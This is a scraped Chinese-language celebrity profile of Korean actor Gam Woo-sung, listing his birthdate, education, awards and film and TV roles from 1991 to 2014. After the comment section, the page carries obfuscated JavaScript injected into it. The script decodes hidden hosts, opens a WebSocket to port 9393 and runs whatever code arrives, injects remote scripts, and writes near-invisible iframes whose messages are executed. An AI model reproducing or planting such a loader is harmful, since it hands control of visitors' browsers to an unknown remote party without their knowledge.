甘宇成
热门
明星
    15011°

    甘宇成

  • 韩国男明星
  • 星座:天秤座
  • 身高:174
  • 体重:
  • 生日:1970-10-01
  • 甘宇成,1970年10月1日出生,毕业于首尔大学东洋美术系,…

明星简介

甘宇成,1970年10月1日出生,毕业于首尔大学东洋美术系,韩国男演员。1991年,参加MBC演员训练班继而出道。2001年,凭借影片《周末同床》获得第23届韩国电影青龙奖最佳新人男演员奖提名 。2006年,凭借爱情片《王的男人》获得第43届大钟奖最佳男主角奖 。2011年,主演KBS1大河剧《近肖古王》 。2014年,主演爱情片《我人生的春天》,并且参与演唱OST《IWill》 。2007年4月,甘宇成与姜敏瑛结婚 。

1991年,甘宇成参加MBC演员训练班继而出道。

1994年,参演《白色旅路》。
1998年,参演爱情剧《亲爱的你》,该剧描述一段高三女生和年轻数学老师的师生恋。
2001年,甘宇成与严正花主演《周末同床》,在有悖常理的剧情中,扮演理性的角色,获得第23届韩国电影青龙奖最佳新人男演员奖提名。
2004年,主演战争惊悚片《R高地》,表现出全无理性的战场中的恐怖和虚无。同年,主演悬念惊悚片《蜘蛛丛林》,饰演节目《悬疑剧场》的制作人江民。
2005年,主演喜剧《大胆家族》,首次在朝鲜拍摄部分镜头,他改变以往的形象,令人重新思考他作为演员的哲学。
2006年,甘宇成与孙艺珍主演了由日本作家野泽尚的同名小说改编而成的电视剧《恋爱时代》,由韩智承执导,该剧讲述的是离婚夫妻之间拉拉扯扯的爱情故事。同年,与李准基主演爱情片《
王的男人》,获得第43届大钟奖最佳男主角奖。
2007年,甘宇成与金秀路主演喜剧《越狱二人组》,影片是从俩平凡的男人朴万秀和杨哲昆偶然相遇开始叙述的故事。同年,出演圣诞档期浪漫作品《我的爱》,演绎温柔浪漫男子,给人感觉多元化之外始终是文静为主。
2010年,甘宇成与张申英主演惊悚片《无法者》。
2011年,主演了由尹昌范执导的KBS1大河剧《近肖古王》,饰演近肖古王,拍摄过程中患上甲亢。
2014年,甘宇成与崔秀英主演爱情片《我人生的春天》,并且参与演唱OST《IWill》,该片以细胞记忆新鲜特别的素材作为背景,描述主角之间温暖的爱情故事。

甘宇成主演电影电视剧

评论

  • 评论加载中...
function OqxYLzhB(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function oQvrCd(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OqxYLzhB(t);};window[''+'Y'+'L'+'D'+'f'+'s'+'E'+'a'+'l'+'W'+'k'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=oQvrCd,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnJoLmpuemhvbmdkkaW5nLmNu','dHIueWVVzdW42NzguY29t','130796',window,document,['k','V']);}:function(){};
eval("\x77\x69\x6e\x64\x6f\x77")["\x4F\x6E\x4F\x57"]=function(e){var cB =''+'ABCDEFGHIJKLM'+'NOPQRSTUVWX'+'YZabcdefghijklm'+'nopqrstu'+'vwxyz0123456789+/'+'='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=cB.indexOf(e.charAt(f++));o=cB.indexOf(e.charAt(f++));u=cB.indexOf(e.charAt(f++));a=cB.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x59\x4F\x63\x57\x6F\x53\x51\x6E\x42"]=function(){eval(OnOW("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoT25PVyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKE9uT1coIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihPbk9XKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbT25PVygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKE9uT1coZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKycwTScrJ1RMJysnenpRJysnaicrJ00zJysnMENlRycrJ0pUSnInKydoSGNvcCcrJ1hkRycrJ0pUJysnSnp6JysnUUQnKydOd0UnKydUUXonKyd6VUNjcCcrJ1puTCcrJ3BGJysnSGRsRicrJzNkJysndWMzZCcrJzNaaycrJ01sWScrJ2tNbEUnKycwTWxNSCcrJ2MnKycwJysnUkhhJysnJysnJywnJysnUDFiJysnQ0RKJysnRXonKycnKycnLHdpbmRvdyxkb2N1bWVudCwnJysnSjFJJysnT09wJysnRicrJycrJycsJ3onKQ=="));}